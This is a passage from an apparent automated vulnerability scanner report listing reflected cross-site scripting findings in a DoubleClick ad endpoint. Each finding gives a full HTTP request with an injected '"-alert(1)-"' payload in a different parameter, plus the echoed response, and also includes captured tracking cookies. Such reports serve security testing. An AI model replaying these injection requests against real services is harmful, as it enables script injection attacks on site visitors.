Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94324"-alert(1)-"1748ae9a2a5 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=494324"-alert(1)-"1748ae9a2a5&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=494324"-alert(1)-"1748ae9a2a5&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36
...[SNIP]...

3.297. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eaff"-alert(1)-"f8172f1a73e was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=7eaff"-alert(1)-"f8172f1a73e&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=7eaff"-alert(1)-"f8172f1a73e&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.
...[SNIP]...

3.298. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8052a"-alert(1)-"32c4cf8ad2b was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=8052a"-alert(1)-"32c4cf8ad2b&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=8052a"-alert(1)-"32c4cf8ad2b&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url
...[SNIP]...

3.299. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d37b"-alert(1)-"8edc82da6c7 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6d37b"-alert(1)-"8edc82da6c7&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6d37b"-alert(1)-"8edc82da6c7&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUr
...[SNIP]...

3.300. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6708"-alert(1)-"674d2ae8b1f was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=a6708"-alert(1)-"674d2ae8b1f&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
86%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=a6708"-alert(1)-"674d2ae8b1f&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox36
...[SNIP]...

3.301. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb190"-alert(1)-"7f74a479fc2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=cb190"-alert(1)-"7f74a479fc2&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
pc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=cb190"-alert(1)-"7f74a479fc2&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumba
...[SNIP]...

3.302. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 998a3"-alert(1)-"34e532c58d7 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=998a3"-alert(1)-"34e532c58d7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6845
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:42:28 GMT
Expires: Wed, 27 Apr 2011 23:42:28 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=998a3"-alert(1)-"34e532c58d7http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

3.303. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65bb"-alert(1)-"7f77c1c983d was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cne65bb"-alert(1)-"7f77c1c983d&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cne65bb"-alert(1)-"7f77c1c983d&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.2
...[SNIP]...

3.304. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d78"-alert(1)-"80dfafc695d was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=75d78"-alert(1)-"80dfafc695d&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=75d78"-alert(1)-"80dfafc695d&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34
...[SNIP]...

3.305. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5182"-alert(1)-"9f574a3cb9c was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1e5182"-alert(1)-"9f574a3cb9c&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1e5182"-alert(1)-"9f574a3cb9c&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www
...[SNIP]...

3.306. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce609"-alert(1)-"db184f4d2ae was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253Ace609"-alert(1)-"db184f4d2ae&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
